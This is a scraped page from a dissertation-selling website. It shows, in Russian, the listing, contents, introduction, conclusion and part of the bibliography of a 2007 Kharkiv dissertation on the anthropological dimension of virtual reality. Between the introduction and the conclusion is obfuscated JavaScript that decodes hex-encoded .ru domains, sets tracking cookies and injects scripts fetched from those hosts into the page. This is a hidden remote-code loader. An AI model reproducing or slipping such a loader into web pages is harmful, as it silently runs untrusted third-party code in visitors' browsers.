АНТРОПОЛОГІЧНИЙ ВИМІР ВІРТУАЛЬНОЇ РЕАЛЬНОСТІ : Антропологические измерения ВИРТУАЛЬНОЙ РЕАЛЬНОСТИ

ПОСЛЕДНИЕ НОВОСТИ

Бесплатное скачивание авторефератов
СКИДКА НА ДОСТАВКУ РАБОТ!
ВНИМАНИЕ АКЦИЯ! ДОСТАВКА ОТДЕЛЬНЫХ РАЗДЕЛОВ ДИССЕРТАЦИЙ!
Авторские отчисления 70%
Снижение цен на доставку работ 2002-2008 годов

 

ПОСЛЕДНИЕ ОТЗЫВЫ

Порядочные люди. Приятно работать. Хороший сайт.
Спасибо Сергей! Файлы получил. Отличная работа!!! Все быстро как всегда. Мне нравиться с Вами работать!!! Скоро снова буду обращаться.
Отличный сервис mydisser.com. Тут работают честные люди, быстро отвечают, и в случае ошибки, как это случилось со мной, возвращают деньги. В общем все четко и предельно просто. Если еще буду заказывать работы, то только на mydisser.com.
Мне рекомендовали этот сайт, теперь я также советую этот ресурс! Заказывала работу из каталога сайта, доставка осуществилась действительно оперативно, кроме того, ночью, менее чем через час после оплаты! Благодарю за честный профессионализм!
Здравствуйте! Благодарю за качественную и оперативную работу! Особенно поразило, что доставка работ из каталога сайта осуществляется даже в выходные дни. Рекомендую этот ресурс!



  • Название:
  • АНТРОПОЛОГІЧНИЙ ВИМІР ВІРТУАЛЬНОЇ РЕАЛЬНОСТІ
  • Альтернативное название:
  • Антропологические измерения ВИРТУАЛЬНОЙ РЕАЛЬНОСТИ
  • Кол-во страниц:
  • 171
  • ВУЗ:
  • ХАРКІВСЬКИЙ НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ ім. В.Н. КАРАЗІНА
  • Год защиты:
  • 2007
  • Краткое описание:
  • ХАРКІВСЬКИЙ НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ
    ім.В.Н.КАРАЗІНА





    ГоРЯЧКОВСЬКА ГАННА МИКОЛАЇВНА



    УДК: 130.2



    АНТРОПОЛОГІЧНИЙ ВИМІР ВірТУАЛЬНОЇ РЕАЛЬНОСТІ


    09.00.04 філософська антропологія, філософія культури








    дисертація на здобуття наукового ступеня
    кандидата філософських наук




    Харків 2007









    АНТРОПОЛОГИЧЕСКОЕ ИЗМЕРЕНИЕ ВИРТУАЛЬНОЙ РЕАЛЬНОСТИ
    СОДЕРЖАНИЕ

    ВВЕДЕНИЕ с.2
    РАЗДЕЛ 1 КОНЦЕПТ ВИРТУАЛЬНОЙ РЕАЛЬНОСТИ с.14
    1.1 Современные представления о виртуальной реальности с.14
    1.2 Концептуальный персонаж виртуальной реальности с.33
    1.3 Переживание как источник антропологического измерения
    виртуальной реальности с.51
    РАЗДЕЛ 2 ОСОБЕННОСТИ АНТРОПОЛОГИЧЕСКОГО ИЗМЕРЕНИЯ ВИРТУАЛЬНОЙ РЕАЛЬНОСТИ с.63
    2.1 Рекурсивный аспект антропологического измерения
    виртуальной реальности с.64
    2.2 Трансценденция и виртуальное событие с.73
    2.3 Игра как модус виртуальной реальности с.83
    РАЗДЕЛ 3 МЕТАМОРФОЗЫ ВИРТУАЛЬНОЙ РЕАЛЬНОСТИ с. 96
    3.1 Процесс символизации экспрессивного переживания............. с. 96
    3.2 Мифологический аспект антропологического измерения
    виртуальной реальности с. 102
    3.3 Язык, пространство и время в процессе объективации
    переживания с.114
    3.4 Симулякр как универсальный знак антропологического
    измерения виртуальной реальности с.125
    ЗАКЛЮЧЕНИЕ с.149
    ЛИТЕРАТУРА с.154








    ВВЕДЕНИЕ
    Актуальность темы исследования.
    Культурные и антропологические процессы сегодняшнего дня отражают нарастающую тенденцию к трансформации рациональности как миропонимания и мировоззренческой составляющей как способности человека понять себя в этом мире. Все большую актуальность приобретают всесторонние исследования виртуальной реальности как неотъемлемой составляющей инфосферы и среды обитания человека нового типа. Нomo virtualis (термин С.Хоружия) становится центром целого ряда гуманитарных проблем XXI века.
    Сегодня мы можем наблюдать процесс активного развития концепта виртуальной реальности. Исследования в различных сферах науки, междисциплинарные изыскания, как, впрочем, и дискурс повседневности, направлены на выявление различных составляющих этого концепта. В чрезвычайно разнообразном и весьма полемизированном дискурсе виртуальности можно обнаружить ее всевозможные определения, небезуспешные попытки обозначить ее основные характеристики и онтологический статус. При этом понятие «виртуальность», прежде всего, соотносят с современным культурным контекстом, применяя к явлениям искусственно создаваемым и контролируемым человеком. Достаточно много говорят о становлении эстетики виртуальности, обращенной к виртуальным артефактам в виде компьютерных двойников действительности, иллюзорно-чувственной квазиреальности (Н.Б.Маньковская), что является свидетельством своеобразной легитимизации процесса сращивания техники и искусства.
    Всплеск интереса к виртуальности правомерно связывают со стремительным развитием кибер-, коммуникационной и, в конечном итоге информационной культуры. Сегодня виртуальная реальность является объектом исследования самых разных сфер науки, а понятие «виртуальность» широко используется в различных дисциплинах: от квантовой механики до эстетики. Такая популярность обусловлена, с одной стороны, гибкостью концепта виртуальности, обеспечивающей описание различных феноменов адекватно многомерному и вариативному миропониманию. С другой стороны, обнаруживается определенная полисемия самого понятия «виртуальная реальность». Претерпев семантические метаморфозы, концепт виртуальной реальности достиг в наши дни наиболее развернутой экспликации, знаменуя яркое выражение современной культуры, где действует принцип радикальной плюральности.
    Неоднозначность интерпретации и мозаичность концепта виртуальности актуализирует проблему его исследования, а размытость понятия «виртуальность» сопряжена с его использованием в самых различных сферах человеческой деятельности и отсутствием адекватного языка описания, способного объединить частные дискурсы виртуальности воедино. В то же время, такое положение вещей вполне соответствует самим свойствам изучаемого феномена, которые выявились благодаря многочисленным исследованиям, и были систематизированы благодаря немногим.
    Виртуальность как интерактивная искусственная среда рассматривается в различных культурных контекстах, ее осмысление лежит в основе обновления практически всех гуманитарных теорий. Концепт виртуальной реальности, возникший в рамках эстетики постмодерна и развивающийся сегодня, представляет виртуальность как синтетический феномен, как симулятивную среду. Симуляция, наряду с другими концепциями постструктурализма (Ж.Деррида, Ж.Делез, Ж.Ф.Лиотар и др.), обусловила современное понимание виртуальности в общекультурном контексте. Современность характеризуется размыванием границ между реальностью и ее представлением, подтверждением чему является расширение симулятивной среды, пространства симулякров, которые имеют отношение лишь к собственно воображаемой реальности.

    Анализ специфики виртуальности в различных видах и жанрах современного искусства, выявляет значительные трансформации эстетического восприятия, которое заняло центральное место в рамках теоретических интересов, вытеснив сам артефакт. Художественная виртуальная реальность способна дать мгновенное осознание целостности комплекса эстетических воздействий и расширить сферу эстетического осознания и видения картины мира, воздействуя на подсознательное. В то же время, отмечается риск невостребованности ассоциативности и эмоциональной памяти, связанный с гиперреалистичностью виртуального мира, а также возможность снижения критичности эстетического восприятия.
    В центре внимания пребывает интерактивность искусственной виртуальной среды: человек оказывается весьма подвержен ее влиянию, что более всего вызывает интерес исследователей. Но искусственная реальность лишь одна из проекций нетехногенной, «естественной» виртуальности, которая проявляется посредством диалога естественного и символического; в центре этого диалога, на наш взгляд, находится переживание, самопознание, внутренний опыт.

    Степень научной разработки проблемы.
    Историко-теоретические аспекты осмысления феномена виртуальности были обозначены работами Ф.Хэммита, М.Хайма, Дж.П.Барлоу и другими авторами, которые отмечали перспективы расширения сферы влияния киберпространства посредством максимальной антропологизации информационного поля. Многочисленные работы Ж.Бодрийара и Ж.Делеза сформировали концепцию симуляции, в основу которой положены социальные и социально-философские аспекты виртуализации общества. Обращение к этой концепции породило большое количество работ отечественных и российских авторов, пытающихся осмыслить проблемы виртуализации с позиций культуры и социума (Н.Маньковская, В.Мотлевский, А.Орлов, Е.Маевский, А.Прохоров, В.Емелин, И.Девтеров, Д.Иванов, Б.Свиринов и др.). Существует целый пласт работ, затрагивающих проблему виртуальности в рамках исследований модальной логики (М.Эпштейн, В.Васюков, А.Родин, Е.Смирнова, Е.Сидоренко и др.).

    Обычно виртуальная реальность обозначается как продукт постиндустриальной информационной электронной цивилизации. Возникновению этого продукта предшествовало совершенствование технического воспроизводства, что привело к созданию мира виртуальных объектов симулякров. Один из первых теоретиков виртуальной реальности, Ф.Хэммит видел исторические предпосылки ее становления в развитии синтетических возможностей кино и кино-симулякров. Именно кинематограф задал целый ряд функций, которые объединяют его эстетику с эстетикой компьютерной виртуальности. Квазиреальное присутствие ирреального, уподобление зрителя творящему Богу, который, переживая впечатления действительности, имеет возможность выйти за пределы экзистенциальной ограниченности (преодолеть смерть, время, тревогу, одиночество и т.п.) это лишь некоторые параллели между кинематографом и компьютерной виртуальностью. Восходя к искусству и возникнув из сплава искусства и техники, сегодня виртуальная реальность имеет возможность воздействовать на нас посредством иллюзий трехмерности и тактильности, превращая из зрителей в участников.
    Эстетика постмодернизма обнаруживает в центре виртуального мира фантомный объект, не имеющий онтологической основы, заменяющий реальность гиперреальным удвоением, способный на взаимопереходы бытия и небытия, нарушающие причинно-следственные связи [113]. Здесь обнаруживается сдвиг на парадигмальном уровне, затрагивающий отказ от оппозиции реальное воображаемое, материальное духовное, живое неживое, естественное искусственное и т. п. Виртуальное искусство тяготеет к перфекционизму принципиальной незаконченности творческого процесса, совершенствование которого не знает пределов. Примером является как компьютограф, основанный на абсолютизации игровой модели бытия и конкурирующий с кинематографом, так и интерактивное телевидение, как гиперлитература, оперирующая текстопорождающими системами, так и виртуальные тенденции в музыке.

    Неотъемлемой составляющей современного концепта виртуальной реальности является симулякр. В философию ХХ века понятие «симулякр» ввел Ж.Батай, определяя таким образом «суверенные моменты» ‑ опьянение, смех, жертвенное и эротическое слияние. «Суверенные моменты» выступают как «примеры опыта прерывности и убегания бытия», они «недосягаемы в их внезапных явлениях» [28]. Основополагающей характеристикой «суверенных моментов» является их избыточность, бесцельная и бессмысленная расточительность, «расход, состоящий в чистой и простой трате», который невозможно выразить посредством понятий.

    Впоследствии симулякр стал предметом рассмотрения многих исследователей. В частности, Ж.Бодрийар, интерпретируя понятие симулякра применительно к сфере социокультурного опыта (в отличие от «внутреннего опыта» Ж.Батая), развивает собственную концепцию симуляции. Чтобы понять принцип симуляции, который, по мнению Ж.Бодрийара, является господствующим в современном мире, автор создает своеобразную генеалогию симулякров, выделяя три порядка симулякров: подделка, производство, симуляция [35]. Концепция симуляции Ж.Бордрийара [30-37], в которой прослеживается связь постмодернистской эстетики с постнеклассическим научным знанием, высокими технологиями, информатикой и средствами электронной информации, является одним из связующих звеньев философии искусства и виртуальности. Оригинальное классическое искусство, согласно Ж.Бодрийару, являет симулякры первого порядка, массовое серийное симулякры второго порядка, «чистую» же симуляцию знаменуют фотография и кинематограф, уничтожившие репрезентацию [35]. Современная культурная ситуация демонстрирует расширение сферы бытования симулякров, перекочевывающих из художественной области в действительность, трансформируя ее в нелинейную, спиралевидную систему без начала и конца.

    Ж.Делез предложил интерпретацию симулякра в связи с проблемой идентичности, проблемой «отмечания разницы» и «проведения различий между вещью как таковой и ее образами, оригиналом и копией, моделью и симулякром» [65]. Он выдвигает для рассмотрения две формулы: «различается только то, что подобно», и «только различное может быть подобно друг другу». Эти два способа прочтения мира определяют соответственно мир копий и мир симулякров. Сомнение, ирония, игра, согласно концепции Ж.Делеза, способны превратить подражание в процесс симуляции, неотделимый от вечного возврата, который переворачивает изображения или ниспровергает установленный мир репрезентации.
    Особый интерес для данного исследования, на наш взгляд, представляет виртуалистика, фундаторами которой являются Н.А.Носов и С.С.Хоружий. Ее методологический принцип зиждется на двух основных посылках. Первой из них является необходимость дополнения понятия объекта научного исследования понятием реальности как среды существования множества разнородных и разнокачественных объектов. Вторая ‑ репрезентует виртуальную реальность как состоящую из отношений разнородных объектов, расположенных в разных иерархических уровнях взаимодействия и порождения объектов (полионтическая модель) [131]. При этом выделяется ряд свойств, характеризующих виртуальную реальность независимо от того, какова ее природа (физическая, психическая, социальная, технологическая и пр.): порожденность, актуальность, автономность и интерактивность. Виртуалистикой разработаны современные концепции философии виртуальной реальности (онтологическая проблематика виртуальной реальности) и психологии виртуальной реальности (антропологическая проблематика виртуальной реальности).
    Исследуя психическую природу виртуальной реальности, Н.А.Носов выделил восемь свойств виртуального события: непривыкаемость, спонтанность, фрагментарность, объективность, измененность статуса телесности, измененность статуса сознания, измененность статуса личности, измененность статуса воли. Эти свойства наглядно демонстрируют особенности среды, с которой сталкивается сознание в рамках виртуального опыта, и взаимосвязь проблемы виртуальности и проблемы сознания, исследуемой психологией (К.Уилбер, С.Грофф, Т.Н.Березина, В.П.Зинченко и др.) и философией (М.К.Мамардашвили, А.М.Пятигорский, В.В.Налимов и др.) В связи с этим, возникает вопрос о способах выражения антропологической виртуальности, ответ на который могло бы дать исследование концепта симулякров и симуляции.
    Современное представление о виртуальной реальности более чем соответствует характеристикам концепта в постнеклассической философии, объединяя самые различные ракурсы: онтологический (С.С.Хоружий), гносеологический (Л.А.Микешина, М.Ю.Опенков), социологический (Ж.Бодрийар), психологический (Н.А.Носов) и пр. Любой из этих ракурсов сопряжен с антропологической проблематикой, которая непосредственно или косвенно присутствует в работах большинства авторов. Проблема антропологического бытия виртуальной реальности тесно связана с порождением символического пространства культуры, и ее исследование, на наш взгляд, способно, значительно обогатить как концепт виртуальности, так и современное понимание культуры. Сосредоточив свое внимание на антропологическом аспекте виртуальной реальности, мы, предположительно, сможем обозначить истоки возникновения антропологической виртуальной реальности, модусы ее выражения и существования, а также роль в процессе символизации мира человеком.
    Цель и задачи исследования
    Целью диссертационной работы является исследование природы и особенностей антропологического измерения виртуальной реальности, а также выявление его значения для процесса культуротворчества.
    Для достижения поставленной цели необходимо решить следующие задачи:
    − проанализировать различные аспекты становления современного концепта виртуальной реальности, выделив проблему антропологического бытия виртуальной реальности;
    − обозначить и прояснить вопрос об источнике возникновения антропологической виртуальной реальности, сопоставив концепцию психологии виртуальной реальности (Н.Носов) с философским дискурсом переживания (С.Л.Франк, Ж.П.Сартр, Ж.Батай);
    − рассмотреть особенности бытия антропологической виртуальной реальности, обратившись к феноменам рекурсии, трансценденции, игры;
    − выявить значение симуляции и символизации как способов объективации и воссоздания антропологической виртуальной реальности;
    − исследовать роль симулякра как продукта симуляции и источника антропологической виртуальной реальности;
    − раскрыть значение антропологической виртуальной реальности как модуса событийности и культуротворчества.
    Объектом исследования является сфера концептуализации феномена виртуальной реальности.
    Предмет исследования антропологическая виртуальная реальность.
    Методологическая основа исследования. В качестве методологических оснований выступают постнеклассическое мышление, принцип мировоззренческого плюрализма и методологические подходы различных теоретических парадигм. В исследовании также используются методы контекстуального и компоративистского анализа научных и философских дискурсов, касающихся проблемы антропологического измерения виртуальной реальности; методы абстрагирования, обобщения и систематизации. Теоретической базой для диссертации стало системное исследование концепта виртуальной реальности, а также работ, в которых рассматриваются проблемы виртуальности. Это труды Ж.Делеза, Ж.Бодрийара, С.Хоружего, Н.Носова и др.
    Научная новизна полученных результатов заключается в следующем:
    − проанализированы различные аспекты становления современного концепта виртуальной реальности, что позволило выделить проблему антропологического бытия виртуальной реальности;
    − обосновано утверждение на основе сравнительного анализа концепции психологии виртуальной реальности (Н.А.Носов) и философского дискурса переживания (С.Л.Франк, Ж.П.Сартр, Ж.Батай) о том, что условием и источником антропологической виртуальной реальности является переживание;
    − показано, что особенности бытия антропологической виртуальной реальности репрезентативно выражены через феномены рекурсии, трансценденции, игры;
    − обосновано утверждение, что симулякр является знаком бытия виртуальной реальности, а симуляция ‑ способом объективации антропологической виртуальной реальности;
    − обосновано утверждение о том, что антропологическая виртуальная реальность является источником символической среды обитания человека, формируемой посредством объективации переживания ‑ симуляции и симулякров (искусство, подделка, тиражирование, производство знаков).
    Теоретическое и практическое значение полученных результатов. Полученные результаты позволяют более адекватно понять суть феномена виртуальной реальности и ее роль в современном философском, научном и повседневном дискурсах. Диссертационное исследование дополняет современный концепт виртуальности, акцентируя внимание на антропологическом аспекте, заполняет лакуны в сфере понимания виртуальной реальности, способствует разрешению актуальных проблем, связанных с изменением человеческого восприятия реальности и изменением самой реальности (в частности, вследствие развития информационных и телекоммуникационных технологий). Методологические подходы, использованные в работе, и полученные с их помощью теоретические положения и выводы могут использоваться как основа для дальнейшей разработки данной проблематики и быть полезными для философов, культурологов, психологов, социологов в дальнейшем исследовании проблем виртуальной реальности, ее влияния на человека и социокультурные реалии. Результаты диссертационной работы могут быть использованы как материал для лекционных курсов в системе высшего образования, прежде всего, для практики преподавания философии и культурологии.
    Апробация результатов диссертации. Основные положения и выводы исследования нашли отражение в докладах и тезисах выступлений на научных конференциях: на 7-м Международном форуме „Радиоэлектроника и молодежь в ХХI веке (Харьков-2003); на 4-й Международной научно-практической конференции студентов, аспирантов и молодых ученых «Человек, культура, техника в новом тысячелетии» (Харьков-2003); на 8-м Международном форуме „Радиоэлектроника и молодежь в ХХI веке (Харьков-2004); на 9-м Международном форуме „Радиоэлектроника и молодежь в ХХI веке (Харьков-2005).
    Публикации. Результаты исследования нашли отражение в 10 научных работах публикациях, среди которых — 6 статей в научных изданиях, включенных в перечень ВАК.

    Структура и объем работы. Диссертация состоит из введения, трех разделов, выводов и списка использованных источников (237 наименований). Полный объем работы ‑ 171 страница, из которых 153 страницы основного текста.



    window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="16197",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("mydisser.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
  • Список литературы:
  • ЗАКЛЮЧЕНИЕ
    Основные результаты диссертационного исследования раскрывают антропологический аспект бытия виртуальной реальности, обозначив ее истоки, способы актуализации и выражения. Источником виртуальной реальности является спонтанное переживание, переживание-созерцание, лишенное каких-либо рефлексивных компонентов, модус антропологического изимерения виртуальной реальности, который может быть условно обозначен как естественная виртуальная реальность. Она отличается полной спонтанной вовлеченностью человека в поток переживания, а также внелогичностью; внепредметностью, бесформенностью и непространственностью (в обычном понимании). Наиболее простым примером субстрата естественной виртуальной реальности является состояние ужаса, которое рассматривалось нами в связи с философией переживания.
    Дальнейшее проявление антропологического измерения виртуальной реальности связано с моментом осознания переживания, что незначительно влияет на степень его интенсивности, но способствует его дальнейшей актуализации. Виртуальная реальность сновидения и прочих измененных состояний сознания зачастую включает в себя момент самосознания, который не снимает внутреннего напряжения, но актуализирует переживание-деятельность. От неосознанного спонтанного переживания-созерцания, являющегося истоком антропологического измерения виртуальной реальности, мы посредством самосознания переходим к способам ее выражения, т.е. феномену неосознанной симуляции. Любое выражение внутреннего переживания (посредством звука, жеста и более сложных форм) является опосредованным (указывающим на нечто иное), а значит симулятивным по своей сути. Мир антропологической виртуальной реальности, изначально лишенный субъектно-объектных отношений, причинно-следственных связей и целеполагания, проявляется в процессе спонтанного выражения переживания. Последующая объективация естественной виртуальной реальности с помощью рефлексивной составляющей представляет собой различные уровни симуляции: неосознанное выражение непосредственного переживания уступает место нарочитому «деланию вида», оформлению переживания посредством целеполагания. В конечном итоге метаморфозы виртуальной реальности обретают фиксацию посредством симулякров, т.е. артефактов, возникающих из различных способов объективации внутреннего переживания.
    Желание человека освоить мир спонтанного переживания, т.е. сделать его доступным, а затем прогнозируемым и управляемым породило различные техники объективации и погружения в мир антропологической виртуальной реальности. Мы можем проследить этот путь от первобытного искусства, мифа и древних сакральных практик до современных концептуальных арт-направлений и компьютерных технологий. Стремление подчинить переживание-созерцание переживанию-действию, сфокусировав внимание на принципе целеполагания и полезности, постепенно выхолащивает спонтанную составляющую, понижая статус непосредственного переживания. От неосознанной симуляции мы все дальше уходим в мир искусственной, сознательно конструируемой виртуальной реальности. Техники и технологии, обращенные к целенаправленному погружению в мир переживания-созерцания, репрезентуют искусственную виртуальную реальность. В условиях искусственной виртуальности на смену спонтанности приходит элемент случайности, имеющий бесконечное количество комбинаций.
    Особенности бытия антропологической виртуальной реальности репрезентативно выражены через феномены рекурсии, трансценденции, игры. Модусы выражения и существования антропологической виртуальной реальности определяются двумя основными принципами рекурсивным механизмом нашего сознания и способностью человека к трансценденции. Эти принципы характеризуют процесс вовлеченности, как в естественную, так и искусственную антропологическую виртуальную реальность. Способность человеческого сознания создавать (вызывать) собственные измененные копии, взаимодействовать с ними и включать их в свою структуру определяется как механизм рекурсии. Его проекцию мы обнаруживаем в процессе объективации переживания: конструирования организованной системы выражения внутренних состояний, их подчинения особым правилам и принципу целеполагания. Рекурсия из способа выражения непосредственного спонтанного переживания (например, в рамках древних сакральных традиций) все более и более становится механизмом целенаправленного создания различных схем вовлечения в мир переживания, что наиболее ярко демонстрирует современная литература, кинематограф, компьютерная виртуальная реальность.
    В тесной взаимосвязи с рекурсивной составляющей антропологического бытия виртуальной реальности пребывает феномен трансценденции. Как переход от одного состояния сознания к другому в процессе переживания трансценденция подробно описывается в рамках виртуалистики (раздел 2.2.). Бесконечная изменчивость и предельность человеческих проявлений объясняется нами как потребность выражать внутренний опыт посредством новых форм. Следует отметить, что наиболее ярким примером взаимодействия принципов трансценденции и рекурсии является феномен игры. Объединяя в себе как элемент спонтанности и новизны, так и определенные уже освоенные и фиксированные правила, игра позволяет проследить переход от естественной к искусственной виртуальности и наоборот. Вовлеченность в процесс игры тесно связана с острым эмоциональным переживанием, самозабвением, характеризующим кульминацию игрового напряжения, полной отрешенностью от обыденности (преодолением привычных пространственно-временных представлений и пр.). Такие характеристики способны вызывать непредсказуемые эмоции и спонтанные перепады настроения, которые определяют степень погруженности в естественную виртуальную реальность игрового пространства. Искусственность, воспроизводимость и объективация игры связана с установлением четких правил, соблюдение которых обеспечивает процесс вовлеченности игроков и зрителей. А сохранение внутреннего порядка игры даже в момент наивысшего напряжения, проявляет принцип трансценденции как способ актуализации антропологической виртуальной реальности. Изначально незаинтересованный, бесцельный характер игры, постепенно обращается к принципу целеполагания, пытаясь подчинить экстатическое состояние увлеченности, острого переживания прагматичным принципам, что само по себе обозначает переход уже к другой игре, новому уровню симуляции. В то же время, главная привлекательность феномена игры, по-прежнему состоит именно в ее способности к актуализации спонтанного переживания естественной антропологической виртуальной реальности.
    В ходе исследования на основе анализа процесса символизации были выявлены основные уровни объективации антропологической виртуальной реальности экспрессия, представление, обозначение. Результатом символизации является симулякр знак бытия виртуальной реальности, а симуляция способом объективации антропологической виртуальной реальности. Было обосновано утверждение о том, что антропологическое измерение виртуальной реальности является источником символической среды обитания человека, формируемой посредством объективации переживания симуляции и симулякров (искусство, подделка, тиражирование, производство знаков). Способы выражения и объективации антропологической виртуальной реальности неразрывно связаны с процессом символизации мира человеком и проблемой культуротворчества. Культура может быть представлена как результат бесконечного процесса неосознанной, и сознательной симуляции. Симуляция является неизменным посредником между внутренним переживанием и объективной действительностью.








    Литература
    1. Аббаньяно Н. Введение в экзистенциализм. - СПб.: Алетейя, 1998. 507 с.
    2. Акчурин И.А. «Новая фундаментальная онтология» и виртуалистика // Виртуалистика: экзистенциальные и эпистемологические аспекты. М.: Прогресс-Традиция, 2004. 384 с.
    3. Андреева Е. Символ или симптом? http://xz.gif.ru/numbers/55/22/
    4. Анисимов А. Компьютерная лингвистика для всех: Мифы. Алгоритмы. Язык. К.: Наукова думка, 1991. 208 с.
    5. Аристов В. Заповедник cнов. (Внетекстовая виртуальная реальность) // Комментарии. - 1997. - № 12. ‑ С.
    6. Арто А. Театр и его двойник. М.: Мартис, 1993. 192 с.
    7. Баксанский О.Е. Виртуальная реальность и виртуализация реальности// Концепция виртуальных миров и научное познание. СПБ.: Изд-во Русск. Христ. гум. ун-та, 2000. ‑ 320 с.
    8. Барт Р. Избранные работы: Семиотика. Поэтика. М. Прогресс, 1989. 616 с.
    9. Батай Ж. Из внутреннего опыта // Танатография Эроса: Жорж Батай и французская мысль середины ХХ века. СПб.: Мифрил, 1994. С. 223-243.
    10. Батай Ж. История глаза // Ненависть к поэзии М.: Ладомир, 1999. С.
    11. Баткин Л. О постмодернизме и "постмодернизме" // Октябрь. ‑ 1996. ‑ №10. С. 34-37.
    12. Бахтин М.М. Вопросы литературы и эстетики. М.: Худ. лит., 1975. с.
    13. Бахтин М. Проблемы творчества Достоевского. К.: , 1994. с.
    14. Бахтин М.М. Творчество Франсуа Рабле и народная культура средневековья и Ренессанса. 2-е изд. ‑ М.:Худ. лит., 1990. 544 с.
    15. Бахтин М.М. Эстетика словесного творчества. М.: Искусство, 1979. с.
    16. Беньямин В. Произведение искусства в эпоху его технической воспроизводимости // Вальтер Беньямин. Произведение искусства в эпоху его технической воспроизводимости. Избранные эссе. М.: Медиум, 1996. 240 с.
    17. Бергсон А. Смех // Психология эмоций. Тексты. М.: Изд-во Моск. Ун-та, 1984. С. 186-191.
    18. Бергсон А. Творческая эволюция. Материя и память. Минск.: Харвест, 1999. 407 с.
    19. Бердяев Н. Истина и откровение: Пролегомены к критике Откровения - СПб.: Изд-во Русск. Христ. гум. ун-та, 1996. 384 с.
    20. Бердяев Н.А. О человеке, его свободе и духовности: Избранные труды. М.: Моск. психолого-социолог. ин-т Флинта, 1999. 312 с.
    21. Бердяев Н. Самопознание. - М.: Книга, 1991. 353 с.
    22. Бердяев Н.А. Философия свободного духа. М.: Республика, 1994. 480 с.
    23. Бердяев Н.А. Философия свободы. Смысл творчества. М.: Правда, 1989. 422 с.
    24. Березина Т.Н. Многомерная психика. Внутренний мир личности. М.: ПЕР СЭ, 2001. 319 с.
    25. Билецкий И.П. Истина и виртуальность // Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. Х.: ХНУ, 2000. ‑ №568. С.
    26. Білик Я.М. Дослідження ігрового феномену в культурі. Харків: Константа, 1998. ‑ 144 с.
    27. Бланшо М. Опыт-предел // Танатография Эроса: Жорж Батай и французская мысль середины ХХ века. СПб.: Мифрил, 1994. С.
    28. Блэк М. Метафора // Теория метафоры. М.: Прогресс, 1990. С 153-172.
    29. Бодрийар Ж. Америка. М.; СПб.: Владимир Даль, 2000. 204 с.
    30. Бодрийар Ж. Ксерокс и бесконечность // Прозрачность зла. М.: Добросвет, 2000. С.
    31. Бодрийяр Ж. О соблазне. ‑ М.: , 1989.- 261 с.
    32. Бодріяр Ж. Реквием по масс-медиа.// Политика и поэтика. М.: , 1999.
    33. Бодрийяр Ж. Символический обмен и смерть. М.: Добросвет, 2000. 389 с.
    34. Бодрийяр Ж. Симулякри і симуляція. К.: Вид-во Соломії Павличко Основи, 2004. 230.
    35. Бодрийяр Ж. Система вещей. М.: Рудомино, 1999. ‑ 168с.
    36. Больнов О. Философия экзистенциализма. - СПб.: Лань, 1999. 222 с.
    37. Борчиков С.А. Метафизика виртуальности.// Труды лаборатории виртуалистики. Вып. 8. М.: Ин-т Человека РАН, 2000. С. 21-22.
    38. Бубер М. Два образа веры. М.: Республика, 1995. ‑ 464 с.
    39. Бычков В.В., Бычкова Л.С. XX век: предельные метаморфозы культуры // Полигнозис. 2000. № 3. С. 82-
    40. Вайнштейн О. Б. Постмодернизм: история или язык? // Постмодернизм и культура: материалы "круглого стола" // Вопросы философии. ‑ М., 1993. ‑ №3. ‑ С. 3 7.
    41. Василюк Ф.Е. Философия переживания (анализ преодоления критических ситуаций). М.: Изд-во Моск. ун-та, 1984. 200 с.
    42. Васюков В.Л. Виртуальные объекты с точки зрения логики и формальной феноменологии // Виртуалистика: экзистенциальные и эпистемологические аспекты. М.: Прогресс-Традиция, 2004. С 26-44.
    43. Великовский С. Умозрение и словесность: Очерки французской культуры ‑ М.; СПб.: Университетская книга, 1998. с.
    44. Вирильо П. Информационная бомба. Стратегия обмана. М.: Гнозис, 2002. 192 с.
    45. Войскунский А.Е. Метафоры Интернета // Вопросы философии. М., ‑ 2001. - №11. С.
    46. Гадамер Г.-Г. Актуальность прекрасного. М.: Искусство, 1991. ‑367 с.
    47. Гадамер Г.-Г. Истина и метод: Основы философской герменевтики М.: Прогресс, 1988. 699 с.
    48. Гайденко П. Трагедия эстетизма: Опыт характеристики миросозерцания С.Кьеркегора - М.: Искусство, 1970. 247 с.
    49. Гаспаров Б. В поисках «другого» // НЛО. 1996. №14. С.
    50. Гессе Г. Игра в бисер. М.: Правда, 1992. 493 с.
